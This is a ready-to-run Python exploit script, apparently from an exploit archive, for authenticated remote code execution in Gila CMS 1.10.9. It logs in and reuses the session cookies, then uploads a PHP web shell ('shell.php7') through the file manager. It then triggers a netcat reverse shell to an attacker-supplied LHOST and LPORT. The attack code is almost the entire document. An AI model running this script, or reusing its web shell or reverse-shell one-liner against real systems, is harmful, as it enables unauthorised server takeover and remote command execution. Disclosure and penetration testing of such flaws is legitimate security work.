e2ea5c0412
4 changes to exploits/shellcodes/ghdb Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) Lost and Found Information System v1.0 - SQL Injection Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
100 lines
No EOL
4.1 KiB
Python
Executable file
100 lines
No EOL
4.1 KiB
Python
Executable file
# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
|
|
# Date: 05-07-2023
|
|
# Exploit Author: Omer Shaik (unknown_exploit)
|
|
# Vendor Homepage: https://gilacms.com/
|
|
# Software Link: https://github.com/GilaCMS/gila/
|
|
# Version: Gila 1.10.9
|
|
# Tested on: Linux
|
|
|
|
import requests
|
|
from termcolor import colored
|
|
from urllib.parse import urlparse
|
|
|
|
# Print ASCII art
|
|
ascii_art = """
|
|
██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗
|
|
██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝
|
|
██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗
|
|
██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝
|
|
╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗
|
|
╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝
|
|
|
|
by Unknown_Exploit
|
|
"""
|
|
|
|
print(colored(ascii_art, "green"))
|
|
|
|
# Prompt user for target URL
|
|
target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")
|
|
|
|
# Extract domain from target URL
|
|
parsed_url = urlparse(target_url)
|
|
domain = parsed_url.netloc
|
|
target_url_2 = f"http://{domain}/"
|
|
|
|
# Prompt user for login credentials
|
|
username = input("Enter the email: ")
|
|
password = input("Enter the password: ")
|
|
|
|
# Create a session and perform login
|
|
session = requests.Session()
|
|
login_payload = {
|
|
'action': 'login',
|
|
'username': username,
|
|
'password': password
|
|
}
|
|
response = session.post(target_url, data=login_payload)
|
|
cookie = response.cookies.get_dict()
|
|
var1 = cookie['PHPSESSID']
|
|
var2 = cookie['GSESSIONID']
|
|
|
|
# Prompt user for local IP and port
|
|
lhost = input("Enter the local IP (LHOST): ")
|
|
lport = input("Enter the local port (LPORT): ")
|
|
|
|
# Construct the payload
|
|
payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"
|
|
payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"
|
|
|
|
# Perform file upload using POST request
|
|
upload_url = f"{target_url_2}fm/upload"
|
|
upload_headers = {
|
|
"Host": domain,
|
|
"Content-Length": "424",
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
|
|
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",
|
|
"Accept": "*/*",
|
|
"Origin": target_url_2,
|
|
"Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",
|
|
"Accept-Encoding": "gzip, deflate",
|
|
"Accept-Language": "en-US,en;q=0.9",
|
|
"Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",
|
|
"Connection": "close"
|
|
}
|
|
upload_data = f'''
|
|
------WebKitFormBoundarynKy5BIIJQcZC80i2
|
|
Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"
|
|
Content-Type: application/x-php
|
|
|
|
<?php system($_GET["cmd"]);?>
|
|
|
|
------WebKitFormBoundarynKy5BIIJQcZC80i2
|
|
Content-Disposition: form-data; name="path"
|
|
|
|
tmp
|
|
------WebKitFormBoundarynKy5BIIJQcZC80i2
|
|
Content-Disposition: form-data; name="g_response"
|
|
|
|
content
|
|
------WebKitFormBoundarynKy5BIIJQcZC80i2--
|
|
'''
|
|
|
|
upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)
|
|
|
|
if upload_response.status_code == 200:
|
|
print("File uploaded successfully.")
|
|
# Execute payload
|
|
response = session.get(payload_url)
|
|
print("Payload executed successfully.")
|
|
else:
|
|
print("Error uploading the file:", upload_response.text) |